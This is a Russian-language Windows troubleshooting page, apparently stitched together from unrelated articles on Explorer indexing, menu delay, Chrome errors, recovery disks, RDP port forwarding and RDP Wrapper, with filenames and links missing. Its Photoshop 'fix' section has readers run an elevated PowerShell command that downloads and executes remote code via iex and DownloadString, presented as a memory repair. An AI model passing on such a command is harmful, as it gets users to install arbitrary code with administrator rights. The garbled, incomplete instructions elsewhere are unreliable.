Как подключиться к удаленному рабочему столу в Windows 10 через RDP

Проводник стал открываться очень медленно? Все элементы файлового интерфейса загружаются слишком долго? Если столкнулись с этой проблемой, возможно, она связана с поврежденным индексом базы данных проводника. Есть несколько быстрых решений, с помощью которых можно восстановить его работу.

Исправить падение Photoshop (not enough RAM)

Меня проблема затронула и мне помог вот этот метод, который я как то раньше использовал, все так же проблема видимо с переполнением памяти и лечится это простым скриптом в PowerShell.

  • Закройте все приложения Adobe, затем Win+X или правой кнопкой по меню Пуск
  • Запустите PowerShell от администратора
  • Подождите, пока появится командная строка
  • Затем скопируйте и вставьте следующую команду PowerShell и нажмите «Enter»
  • Он запросит дополнительные разрешения для изменения реестра.
  • Разрешить выполнение.
  • Теперь запустите Adobe Photoshop.

powershell -nop -c "iex (New-Object ).DownloadString (' ')

"У меня стало работать как и прежде, исправило все проблемы. Хотя я придерживаюсь такого понятия перенести все в онлайн, замену иллюстратору нашел, а вот фотошоп пока безальтернативен. Надеюсь информация будет полезна.

comments powered by HyperComments

Как ускорить отклик меню?

Твик выполнить очень просто. Нажимаем «Win+R» и в открывшемся окошке набираем команду «regedit».

В редакторе реестра переходим в раздел: HKEY_CURRENT_USER/Control Panel/Desktop

Находим параметр: MenuShowDelay Если таковой отсутствует, то создаем новый строковый параметр с таким же названием. Далее выставляем его значение в пределах от 100 до 600 (целое число). Эти цифры – время задержки появления контекстного меню в миллисекундах после клика мышкой. Системное значение времени задержки по умолчанию – 400 миллисекунд, его можно выставить по вашему желанию.

Не устанавливайте значение параметра MenuShowDelay равным нулю, иначе с меню работать будет невозможно. Попробуйте начать с 200 миллисекунд, а если вам покажется много – потихоньку уменьшайте эту величину до 100.

По завершения кликните «ОК» — изменения вступят в силу. Если этого не случилось – перезапустите проводник. Если по каким-либо причинам вам нужно будет вернуть изменения – установите значение MenuShowDelay равным 400 или вовсе удалите этот параметр.

Решение ошибки с неработающим Google Chrome в Windows 1803

Ошибка с неработающим браузером Google Chrome связана с обновлением KB4103721. Оно выпущено после обновления до 1803, а поэтому на многих компьютерах отсутствует. Его нужно установить вручную. Для этого стоит выполнить следующие действия.

  • Открываем «Параметры», «Обновления и безопасность» и нажимаем «Проверить обновление».
  • Увидим доступное обновление. Перезагружаем систему для его установки.
  • Запустится установка апгрейда. После этого номер сборки (не версии) измениться на

В случае, если установка обновления не произошла или обновления в списке не обозначено, стоит скачать его с сайта Майкрософт. Для этого перейдите по ссылке и выберите версию, разрядность Windows 10. Нажмите «Скачать».

После загрузки пакета нужно двойным кликом запустить его установку.

После инсталляции нужно перезагрузить операционную систему.

Проблема с неработающим браузером Google Chrome в Windows 10 1803 будет исправлена.

Windows не загружается дальше логотипа

Другая известная проблема заключается в том, что система загружается вплоть до логотипа Windows, после чего компьютер самопроизвольно отключается. Причина этой ошибки также заключается в повреждении системных файлов, однако, в отличие от первого случая, повреждения настолько серьезны, что система не может сама запустить восстановление.

В этом случае придется создать аварийный диск восстановления Windows на другом ПК с Windows 10:

  1. В панели управления Windows 10 найдите и выберите пункт Восстановление > Создание диска восстановления.
  2. В отобразившемся окне установите параметр Выполнить резервное копирование системных файлов на диск восстановления и нажмите Далее.
  3. Подключите к компьютеру пустой USB-накопитель. Выберите его в окне создания диска восстановления и нажмите Далее > Создать. Дождитесь окончания копирования файлов и нажмите Готово.
  4. Извлеките USB-накопитель из компьютера, подключите его к тому, на котором не запускается Windows 10, и включите загрузку с него в BIOS.
  5. Запустится среда восстановления Windows. В ней нужно выбрать Восстановление образа системы, либо пункт Командная строка, а затем ввести в ней команды из инструкции по решению первой проблемы.

Среда восстановления Windows

Также можно запустить среду восстановления системы с диска, с которого вы устанавливали Windows. Для этого надо загрузиться с установочного диска, в загрузчике вместо Установить нажать Восстановление системы. В отобразившемся меню выбрать Поиск и устранения неисправностейДополнительные параметры. Будет открыто то же самое окно опций, приведенное выше.

После восстановления компьютер будет перезагружен. Верните в BIOS загрузку с жесткого диска, и система должна будет запуститься корректно.

Перестройка индекса базы данных

Записи атрибутов данных хранятся в файле Повреждение этой базы данных или возникновения несоответствий в его содержимом может привести к медленной работе проводника. В этом случае сначала удалим , затем восстановим в настройках индексирования.

Удалить этот файл обычным способом не удастся, сначала нужно завершить фоновый процесс и остановить службу.

Щелкните правой кнопкой мыши на значке Windows и выберите «Диспетчер задач».

На вкладке Подробности найдите процесс , щелкните по нему правой кнопкой и выберите «Снять задачу». После остановки закройте окно диспетчера задач.

Откройте системные службы командой из окна Win + R.

В списке найдите службу Windows Search, правым кликом мыши по ней вызовите контекстное меню и выберите «Остановить».

Выйдите из окна служб, затем нажмите на Win + E, чтобы открыть Проводник. В меню Вид кликните на опцию Параметры.

Затем на вкладке Вид в дополнительных параметрах найдите опцию «Показать скрытые файлы, папки и диски» и отметьте ее флажком. Примените изменения на «ОК».

Теперь перейдите в следующую локацию: C:\ProgramData\Microsoft\Search\Data\Applications\Windows. Кликните правой кнопкой на файл и выберите «Удалить».

Клавишами Win + S выведите на экран поисковую строку и введите Параметры индексирования. При отображении их в результатах поиска, щелкните по найденной функции. В новом окне кликните на «Дополнительно».

В разделе Устранения неполадок нажмите на кнопку «Перестроить». При отображении запроса кликните на «ОК», чтобы сохранить изменения.

Подождите, пока система перестроит базы данных индекса.

Проблемы с Windows 1803

Мы уже упомянули о том, что начиная с версии 1803 домашняя группа была удалена с Windows 10. Мнение разработчиков следующее: рабочая (домашняя) группа – метод, мягко говоря, устаревший для создания локальной сети между несколькими компьютерами. В качестве альтернативы разработчики Microsoft предлагают более современные способы общего доступа – облачный сервис OneDrive, общая работа за компьютером через аккаунт Microsoft.

Можно долго спорить, оправдан ли такой шаг. Но многие пользователи до сих пор пользуются локальной группой.

Если на сборке 1803 не работает сетевое обнаружение, проверьте работу службы Function Discovery Resource Publication. Ранее мы ее включили в общий список служб, работу которых нужно проверить.

Можно ли удалить файлы оптимизации доставки?

Удалить файлы – это полностью избавиться от этой функции. В большинстве случаев будут заблокированы или частично приостановлены обновления. Файлы загрузятся только через сервера «Майков», а это значит, что в разы медленнее, чем через исходные каналы.

Чтобы удалить файлы, можно воспользоваться функцией «Очистка диска». Она позволяет понять, что можно удалить, а что нельзя, и как это повлияет на работу операционной системы.

Важно! Не рекомендуется убирать временные файлы установки Виндовса, хоть система и говорит, что это безопасно.

Через очистку диска удаляются файлы. Таким образом функция практически перестает работать, а все загрузки можно также почистить этим методом.

Настройка Windows и учётных записей

Тут всё ещё проще! Открываем свойства компьютера (win + pause) и выбираем Дополнительные параметры системы, как на скриншоте ниже.

Дополнительные параметры системы

В открывшемся окне переходим на вкладку Удаленный доступ. Отмечаем галочками Разрешить подключения удалённого помощника к этому компьютеру, Разрешить удаленные подключения к этому компьютеру. Остаётся теперь только Выбрать пользователей. Жмёте Добавить и выберете из списка необходимых вам пользователей. Если у вас есть домен, то для удобства можно выбрать сразу всех Пользователи домена.

Разрешить подключения удалённого помощника к этому компьютеру — не обязательна.

Параметры вкладки «Удалённый доступ»

Настройка завершена! Для проверки запускаем файл из папки с программой.

Проверка подключения средствами программы

Подключение к удаленному рабочему столу Windows через Интернет

Настройка сети и проброс порта на роутере для подключения по RDP

Для подключения к удаленному хосту из внешней сети вам нужно будет выполнять ряд дополнительных действия, а именно: определить внешний и внутренний IP адрес вашего компьютера и выполнить такую процедуру как проброс порта 3389 в роутере. Это необходимо, поскольку удаленный компьютер находится «за роутером», через который нам нужно пробиться. Трудность здесь в том, что модели роутеров у всех разные, поэтому вам придется немного покопаться, чтобы найти нужную настройку в своей модели маршрутизатора. В данном примере используется роутер D-Link 300.

  1. Кликните правой кнопкой мыши по значку соединения в системном трее и нажмите «Открыть параметры сети и интернет»;
  2. Нажмите кнопку свойства и в следующем окне найдите параметр IPv4 адрес. Это и есть IP адрес вашего устройства в локальной сети. Запишите его.
  3. Определите ваш внешний IP адрес на сайте и запишите его;
  4. Перейдите в браузере по адресу или и введите логин/пароль роутера (по умолчанию используется admin/admin);
  5. Зайдите в раздел «Настроить вручную», переключитесь на вкладку «Межсетевой экран» → «Виртуальные серверы» и нажмите кнопку «Добавить»;
  6. В следующем окне укажите данные для подключения:
    • Шаблон — оставляем Custom.
    • Имя — произвольное на латинице.
    • Внешний интерфейс — скорее всего, будет только один, оставляем без изменений.
    • Проколол — лучшего всего TCP.
    • Внешний и внешний порт (Начальный) — 3389.
    • Внутренний IP — IPv4 адрес находящегося за роутером ПК, вы его уже записали, смотрите пункт No2.
    • Внешний IP — полученный с помощью сервиса IP адрес (если IP динамический, т.е. он часто меняется, это поле можно оставить пустым. В некоторых моделях маршрутизаторов его может и не быть вовсе).
  7. Сохраните настройки нажатием кнопки «Изменить».

Дальнейшая процедура подключения сходна с описанной выше процедурой подключения в LAN, только вместо имени компьютера нужно ввести связку внешнего IP адреса и открытого порта, например, вот так: :3389. Клиент запускаем уже известной нам mstsc. Далее вводим пароль, после чего система открывает доступ к удаленному хосту.

Способ 1: Замена файла конфигурации

Проблемы с работой рассматриваемой программы возникают вследствие обновлений системной библиотеки Под каждую её версию RDP Wrap нужно конфигурировать заново. К счастью, разработчики приложения заботятся об этом сами и после каждого мажорного апдейта выпускают новый конфигурационный файл. Алгоритм его замены выглядит следующим образом:

  1. Перейдите по ссылке в репозиторий приложения на GitHub. Репозиторий на GitHub
  2. Откройте каталог res двойным щелчком левой кнопки мыши. Найдите внутри ссылку с именем и кликните по ней правой кнопкой мыши. Выберите пункт «Сохранить ссылку как…» (в других браузерах – «Сохранить объект как…» или похожее по смыслу).

    Сохраните файл в любое подходящее место на компьютере.

Теперь откройте утилиту «Выполнить» сочетанием Win+R, введите в неё запрос и нажмите «ОК».

После запуска списка служб найдите запись «Службы удалённых рабочих столов», выделите её и нажмите «Остановить службу».

Подтвердите остановку.

Далее откройте «Проводник» и перейдите по следующему адресу:

C:Program FilesRDP Wrapper

Скопируйте полученный ранее и вставьте в эту папку.

Способ 1: Замена файла конфигурации

Подтвердите замену файла.

Способ 1: Замена файла конфигурации

Перезагрузите компьютер, после чего откройте монитор враппера с именем RDConfig.

Способ 1: Замена файла конфигурации

Проверьте строку «Listener» – если надпись в ней гласит «Fully supported», проблема устранена.

Данный метод является предпочтительным, и к следующему следует прибегать только в случае отсутствия его эффективности.

1 Звезда2 Звезды3 Звезды4 Звезды5 Звезд (Пока оценок нет)
Загрузка...
Понравилась статья? Поделиться с друзьями:
Adblock
detector